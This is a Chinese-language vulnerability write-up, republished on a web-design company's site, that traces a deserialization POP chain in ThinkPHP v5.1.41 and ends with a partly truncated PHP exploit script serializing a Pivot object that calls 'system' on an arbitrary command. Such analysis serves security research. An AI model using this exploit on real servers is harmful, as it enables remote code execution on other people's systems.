大橙子网站建设,新征程启航

为企业提供网站建设、域名注册、服务器等服务

Thinkphpv5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP,很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。

创新互联专业为企业提供监利网站建设、监利做网站、监利网站设计、监利网站制作等企业网站建设、网页设计与制作、监利企业网站模板建站服务,十多年监利做网站经验,不只是建网站,更提供有价值的思路和整体网络服务。

TP5141 反序列化

# Author: 4ut15m
# Date: 2021年4月11日 22:45:46
# Version: thinkphp v5.1.41LTS
# Install: composer create-project topthink/think tp5141 5.1.41 --prefer-dist

晚上回顾tp以前反序列化漏洞的时候发现的,好像是一条新的POP链,没有在网上看见其他师傅发表这条链

POP链

Windows->__destruct	-->Windows->removeFiles		-->Conversion->__toString		-->Conversion->toJson		-->Conversion->toArray		-->Attribute->getAttr


Conversion->Model
Model->Pivot

先看命令执行处,若$closure$value都可控,即可执行命令

Thinkphp v5.1.41反序列化漏洞的分析及EXP

POP链首和tp5.0反序列化漏洞起点一样,Windows->__destruct

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Windows->removeFiles,控制Windows->files可以删除任意文件。

Thinkphp v5.1.41反序列化漏洞的分析及EXP

file_exists函数可触发__toString魔术方法,找到Conversion的toString

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟进Conversion->toArray,$this->append可控

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟进getRelation,使得该方法返回null即可进入if

Thinkphp v5.1.41反序列化漏洞的分析及EXP

跟进getAttr,发现关键点

Thinkphp v5.1.41反序列化漏洞的分析及EXP

要使代码执行到493行,需要设置$this->withAttr[$fileName].$closure$this->withAttr[$fileName]控制,$this->withAttr可控,$fileName由我们参数$name即我们传入的$this->append的key控制,也是可控的。

value由getData得到

Thinkphp v5.1.41反序列化漏洞的分析及EXP

代码第269行,如果$this->data中存在$name键,就将$this->data[$name]的值赋给value,$this->data与$name皆可控,故value可控

整理思路如下

Conversion->append = ["4ut15m"=>[]]
Conversion->relation = false
Conversion->withAttr = ["4ut15m"=>"system"]
Conversion->data = ["4ut15m"=>"cmd"]			//要执行的命令

因为convertion是trait类,所以只要找到一个使用了conversion的类即可,全局搜索conversion找到Model类

Thinkphp v5.1.41反序列化漏洞的分析及EXP

由于Model是抽象类,我们得找到Model的实现类,全局搜索找到Pivot

Thinkphp v5.1.41反序列化漏洞的分析及EXP

至此可以编写exp

Windows->files = new Pivot()
Pivot->relation = false
Pivot->data = ["4ut15m"=>"cmd"]		//要执行的命令
Pivot->withAttr = ["4ut15m"=>"system"]

exp

[]];

    public function __construct($cmd){
        $this->relation = false;
        $this->data = ['4ut15m'=>$cmd];		//任意值,value
        $this->withAttr = ['4ut15m'=>'system'];
    }
}

namespace think\model;
use think\Model;
class Pivot extends Model{
}


namespace think\process\pipes;
use think\model\Pivot;
class Windows{
    private $files = [];

    public function __construct($cmd){
        $this->files = [new Pivot($cmd)];		//Conversion类
    }

}

$windows = new Windows($argv[1]);
echo urlencode(serialize($windows))."\n";


?>

在tp中加一个反序列化点

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

Thinkphp v5.1.41反序列化漏洞的分析及EXP

看完上述内容是否对您有帮助呢?如果还想对相关知识有进一步的了解或阅读更多相关文章,请关注创新互联行业资讯频道,感谢您对创新互联的支持。


当前题目:Thinkphpv5.1.41反序列化漏洞的分析及EXP
链接URL:http://dzwzjz.com/article/ihcdji.html
在线咨询
服务热线
服务热线:028-86922220
TOP